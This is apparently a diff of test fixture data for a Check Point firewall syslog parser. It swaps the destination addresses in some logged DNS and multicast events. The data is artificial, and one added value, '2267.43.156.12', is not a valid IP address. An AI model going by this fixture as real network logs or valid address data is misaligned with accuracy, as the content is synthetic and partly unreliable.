 <134>1 2020-03-29T18:43:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec5e,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36783"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec60,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:46Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec62,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:43:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63482"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:43:47Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63482"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:43:49Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"425984"; ifdir:"outbound"; ifname:"eth0"; logid:"1"; loguid:"{0x5e80ec67,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.83.198.43"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54898"; service:"80"; src:"192.168.1.100"; tcp_flags:"FIN-ACK"; tcp_packet_out_of_state:"First packet isn't SYN"]
 <134>1 2020-03-29T18:44:02Z gw-da58d3 CheckPoint 8363 - [alert:"alert"; flags:"139328"; ifdir:"inbound"; ifname:"daemon"; loguid:"{0x5e80ec73,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; sequencenum:"1"; version:"5"; description:"Error occur"; product:"RAD"; reason:"Failed to fetch CP Site Resource. Couldn't resolve host name, check /opt/CPsuite-R80.40/fw1/log/rad_events/Errors/flow_5779_85_MAIN_CHILD For more details"; severity:"3"]
 <134>1 2020-03-29T18:44:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec75,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43141"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:44:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64111"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:44:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64111"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:44:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec94,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50775"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:44:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec94,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50776"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:44:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec95,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -4059,7 +4059,7 @@
 <134>1 2020-03-29T18:48:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ed85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:49:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edb5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39916"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:49:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edb7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:49:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edba,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56281"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T18:49:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edba,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56281"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:50:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80edeb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50593"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T18:50:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80eded,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T18:50:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80edf9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35409"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
@@ -4068,8 +4068,8 @@
 <134>1 2020-03-29T18:50:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edfc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50788"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:51:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee21,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"]
 <134>1 2020-03-29T18:51:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee22,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
-<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T18:51:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"]
 <134>1 2020-03-29T18:51:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee3b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"]
 <134>1 2020-03-29T18:51:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee3d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -4361,10 +4361,10 @@
